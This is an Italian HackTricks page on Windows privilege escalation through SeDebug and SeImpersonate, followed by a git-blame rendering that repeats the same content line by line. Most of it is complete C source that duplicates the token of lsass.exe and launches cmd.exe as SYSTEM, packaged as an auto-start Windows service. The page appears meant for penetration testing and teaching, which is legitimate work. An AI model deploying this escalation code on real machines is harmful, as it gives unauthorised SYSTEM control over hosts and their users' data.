hacktricks/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


Il seguente codice **sfrutta i privilegi SeDebug e SeImpersonate** per copiare il token da un **processo in esecuzione come SYSTEM** e con **tutti i privilegi del token**. \
In questo caso, questo codice può essere compilato e utilizzato come un **file binario di servizio Windows** per verificare che funzioni.\
Tuttavia, la parte principale del **codice in cui avviene l'elevazione** è all'interno della **funzione** **`Exploit`**.\
All'interno di quella funzione puoi vedere che il **processo **_**lsass.exe**_** viene cercato**, poi il suo **token viene copiato**, e infine quel token viene utilizzato per avviare un nuovo _**cmd.exe**_ con tutti i privilegi del token copiato.

**Altri processi** in esecuzione come SYSTEM con tutti o la maggior parte dei privilegi del token sono: **services.exe**, **svhost.exe** (uno dei primi), **wininit.exe**, **csrss.exe**... (_ricorda che non sarai in grado di copiare un token da un processo protetto_). Inoltre, puoi utilizzare lo strumento [Process Hacker](https://processhacker.sourceforge.io/downloads.php) in esecuzione come amministratore per vedere i token di un processo.
```c
// From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#pragma comment (lib, "advapi32")

TCHAR* serviceName = TEXT("TokenDanceSrv");
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
HANDLE stopServiceEvent = 0;

//This function will find the pid of a process by name
int FindTarget(const char *procname) {

HANDLE hProcSnap;
PROCESSENTRY32 pe32;
int pid = 0;

hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return 0;
}

while (Process32Next(hProcSnap, &pe32)) {
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}

CloseHandle(hProcSnap);

return pid;
}


int Exploit(void) {

HANDLE hSystemToken, hSystemProcess;
HANDLE dupSystemToken = NULL;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
int pid = 0;


ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));

// open high privileged process
if ( pid = FindTarget("lsass.exe") )
hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
else
return -1;

// extract high privileged token
if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
CloseHandle(hSystemProcess);
return -1;
}

// make a copy of a token
DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);

// and spawn a new process with higher privs
CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

return 0;
}


void WINAPI ServiceControlHandler( DWORD controlCode ) {
switch ( controlCode ) {
case SERVICE_CONTROL_SHUTDOWN:
case SERVICE_CONTROL_STOP:
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

SetEvent( stopServiceEvent );
return;

case SERVICE_CONTROL_PAUSE:
break;

case SERVICE_CONTROL_CONTINUE:
break;

case SERVICE_CONTROL_INTERROGATE:
break;

default:
break;
}
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}

void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
// initialise service status
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwControlsAccepted = 0;
serviceStatus.dwWin32ExitCode = NO_ERROR;
serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );

if ( serviceStatusHandle ) {
// service is starting
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do initialisation here
stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );

// running
serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

Exploit();
WaitForSingleObject( stopServiceEvent, -1 );

// service was stopped
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do cleanup here
CloseHandle( stopServiceEvent );
stopServiceEvent = 0;

// service is now stopped
serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}
}


void InstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );

if ( serviceControlManager ) {
TCHAR path[ _MAX_PATH + 1 ];
if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
SC_HANDLE service = CreateService( serviceControlManager,
serviceName, serviceName,
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
0, 0, 0, 0, 0 );
if ( service )
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

void UninstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );

if ( serviceControlManager ) {
SC_HANDLE service = OpenService( serviceControlManager,
serviceName, SERVICE_QUERY_STATUS | DELETE );
if ( service ) {
SERVICE_STATUS serviceStatus;
if ( QueryServiceStatus( service, &serviceStatus ) ) {
if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
DeleteService( service );
}
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

int _tmain( int argc, TCHAR* argv[] )
{
if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
InstallService();
}
else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
UninstallService();
}
else  {
SERVICE_TABLE_ENTRY serviceTable[] = {
{ serviceName, ServiceMain },
{ 0, 0 }
};

StartServiceCtrlDispatcher( serviceTable );
}

return 0;
}
```
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.

</details>
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated to Italian 2024-02-10 13:03:23 +00:00			`Il seguente codice sfrutta i privilegi SeDebug e SeImpersonate per copiare il token da un processo in esecuzione come SYSTEM e con tutti i privilegi del token. \`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`In questo caso, questo codice può essere compilato e utilizzato come un file binario di servizio Windows per verificare che funzioni.\`
			Tuttavia, la parte principale del codice in cui avviene l'elevazione è all'interno della funzione `Exploit`.\
			`All'interno di quella funzione puoi vedere che il processo _lsass.exe_ viene cercato, poi il suo token viene copiato, e infine quel token viene utilizzato per avviare un nuovo _cmd.exe_ con tutti i privilegi del token copiato.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`Altri processi in esecuzione come SYSTEM con tutti o la maggior parte dei privilegi del token sono: services.exe, svhost.exe (uno dei primi), wininit.exe, csrss.exe... (_ricorda che non sarai in grado di copiare un token da un processo protetto_). Inoltre, puoi utilizzare lo strumento [Process Hacker](https://processhacker.sourceforge.io/downloads.php) in esecuzione come amministratore per vedere i token di un processo.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```c
a 2024-02-08 03:06:37 +00:00			`// From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#include <windows.h>`
			`#include <tlhelp32.h>`
			`#include <tchar.h>`
			`#pragma comment (lib, "advapi32")`

			`TCHAR* serviceName = TEXT("TokenDanceSrv");`
			`SERVICE_STATUS serviceStatus;`
			`SERVICE_STATUS_HANDLE serviceStatusHandle = 0;`
			`HANDLE stopServiceEvent = 0;`

			`//This function will find the pid of a process by name`
			`int FindTarget(const char *procname) {`

Translated to Italian 2024-02-10 13:03:23 +00:00			`HANDLE hProcSnap;`
			`PROCESSENTRY32 pe32;`
			`int pid = 0;`

			`hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);`
			`if (INVALID_HANDLE_VALUE == hProcSnap) return 0;`

			`pe32.dwSize = sizeof(PROCESSENTRY32);`

			`if (!Process32First(hProcSnap, &pe32)) {`
			`CloseHandle(hProcSnap);`
			`return 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

Translated to Italian 2024-02-10 13:03:23 +00:00			`while (Process32Next(hProcSnap, &pe32)) {`
			`if (lstrcmpiA(procname, pe32.szExeFile) == 0) {`
			`pid = pe32.th32ProcessID;`
			`break;`
			`}`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`CloseHandle(hProcSnap);`

			`return pid;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`


Translated to Italian 2024-02-10 13:03:23 +00:00			`int Exploit(void) {`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`HANDLE hSystemToken, hSystemProcess;`
			`HANDLE dupSystemToken = NULL;`
			`HANDLE hProcess, hThread;`
			`STARTUPINFOA si;`
			`PROCESS_INFORMATION pi;`
			`int pid = 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00

Translated to Italian 2024-02-10 13:03:23 +00:00			`ZeroMemory(&si, sizeof(si));`
			`si.cb = sizeof(si);`
			`ZeroMemory(&pi, sizeof(pi));`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`// open high privileged process`
			`if ( pid = FindTarget("lsass.exe") )`
			`hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);`
			`else`
			`return -1;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`// extract high privileged token`
			`if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {`
			`CloseHandle(hSystemProcess);`
			`return -1;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

Translated to Italian 2024-02-10 13:03:23 +00:00			`// make a copy of a token`
			`DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`// and spawn a new process with higher privs`
			`CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",`
			`NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`return 0;`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00

Translated to Italian 2024-02-10 13:03:23 +00:00			`void WINAPI ServiceControlHandler( DWORD controlCode ) {`
			`switch ( controlCode ) {`
			`case SERVICE_CONTROL_SHUTDOWN:`
			`case SERVICE_CONTROL_STOP:`
			`serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`SetEvent( stopServiceEvent );`
			`return;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`case SERVICE_CONTROL_PAUSE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`case SERVICE_CONTROL_CONTINUE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`case SERVICE_CONTROL_INTERROGATE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`default:`
			`break;`
			`}`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`
			`}`

			`void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {`
			`// initialise service status`
			`serviceStatus.dwServiceType = SERVICE_WIN32;`
			`serviceStatus.dwCurrentState = SERVICE_STOPPED;`
			`serviceStatus.dwControlsAccepted = 0;`
			`serviceStatus.dwWin32ExitCode = NO_ERROR;`
			`serviceStatus.dwServiceSpecificExitCode = NO_ERROR;`
			`serviceStatus.dwCheckPoint = 0;`
			`serviceStatus.dwWaitHint = 0;`

			`serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );`

			`if ( serviceStatusHandle ) {`
			`// service is starting`
			`serviceStatus.dwCurrentState = SERVICE_START_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`// do initialisation here`
			`stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );`

			`// running`
			`serviceStatus.dwControlsAccepted \|= (SERVICE_ACCEPT_STOP \| SERVICE_ACCEPT_SHUTDOWN);`
			`serviceStatus.dwCurrentState = SERVICE_RUNNING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`Exploit();`
			`WaitForSingleObject( stopServiceEvent, -1 );`

			`// service was stopped`
			`serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`// do cleanup here`
			`CloseHandle( stopServiceEvent );`
			`stopServiceEvent = 0;`

			`// service is now stopped`
			`serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP \| SERVICE_ACCEPT_SHUTDOWN);`
			`serviceStatus.dwCurrentState = SERVICE_STOPPED;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`


			`void InstallService() {`
Translated to Italian 2024-02-10 13:03:23 +00:00			`SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );`

			`if ( serviceControlManager ) {`
			`TCHAR path[ _MAX_PATH + 1 ];`
			`if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {`
			`SC_HANDLE service = CreateService( serviceControlManager,`
			`serviceName, serviceName,`
			`SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,`
			`SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,`
			`0, 0, 0, 0, 0 );`
			`if ( service )`
			`CloseServiceHandle( service );`
			`}`
			`CloseServiceHandle( serviceControlManager );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`void UninstallService() {`
Translated to Italian 2024-02-10 13:03:23 +00:00			`SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );`

			`if ( serviceControlManager ) {`
			`SC_HANDLE service = OpenService( serviceControlManager,`
			`serviceName, SERVICE_QUERY_STATUS \| DELETE );`
			`if ( service ) {`
			`SERVICE_STATUS serviceStatus;`
			`if ( QueryServiceStatus( service, &serviceStatus ) ) {`
			`if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )`
			`DeleteService( service );`
			`}`
			`CloseServiceHandle( service );`
			`}`
			`CloseServiceHandle( serviceControlManager );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`int _tmain( int argc, TCHAR* argv[] )`
			`{`
Translated to Italian 2024-02-10 13:03:23 +00:00			`if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {`
			`InstallService();`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`
Translated to Italian 2024-02-10 13:03:23 +00:00			`else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {`
			`UninstallService();`
			`}`
			`else {`
			`SERVICE_TABLE_ENTRY serviceTable[] = {`
			`{ serviceName, ServiceMain },`
			`{ 0, 0 }`
			`};`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`StartServiceCtrlDispatcher( serviceTable );`
			`}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`return 0;`
			`}`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`{% hint style="success" %}`
			`Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`<summary>Supporta HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos su github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:13:27 +00:00			`{% endhint %}`